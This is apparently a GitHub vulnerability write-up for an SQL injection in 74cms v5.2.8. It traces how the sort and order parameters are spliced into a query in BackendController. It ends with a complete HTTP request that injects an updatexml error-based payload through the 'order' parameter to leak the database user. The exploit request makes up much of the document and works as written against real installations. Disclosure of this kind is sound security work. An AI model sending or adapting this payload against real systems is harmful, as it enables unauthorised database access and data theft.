Skip to content
Switch branches/tags
Go to file
Cannot retrieve contributors at this time

74cms v5.2.8 SQLI


The vulnerability is generated by the _list method in the Common/Controller/BackendController.class.php file, using the I() in the _list method to receive the sort and order parameters, and the splicing assignment to $order_by.

$order_by enters the SQL query by splicing, resulting in SQL injection.

The _list method is called in the index method.

Taking Admin/Controller/AdController.class.php as an example, the AdController class inherits the BackendController class and calls index() in the category method.


Log in to the administrator account and send the following request packet.

GET /74cms/upload/index.php?m=Admin&c=Ad&a=category&sort=1&order=and+updatexml(0,concat(0x7e,user()),0) HTTP/1.1
Host: [::]
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://[::]/74cms/upload/index.php?m=Admin&c=index&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: XDEBUG_SESSION=PHPSTORM; think_template=default; PHPSESSID=4gibptgp8kflrc0f9sd2t8pfm0; think_language=zh-CN
Connection: close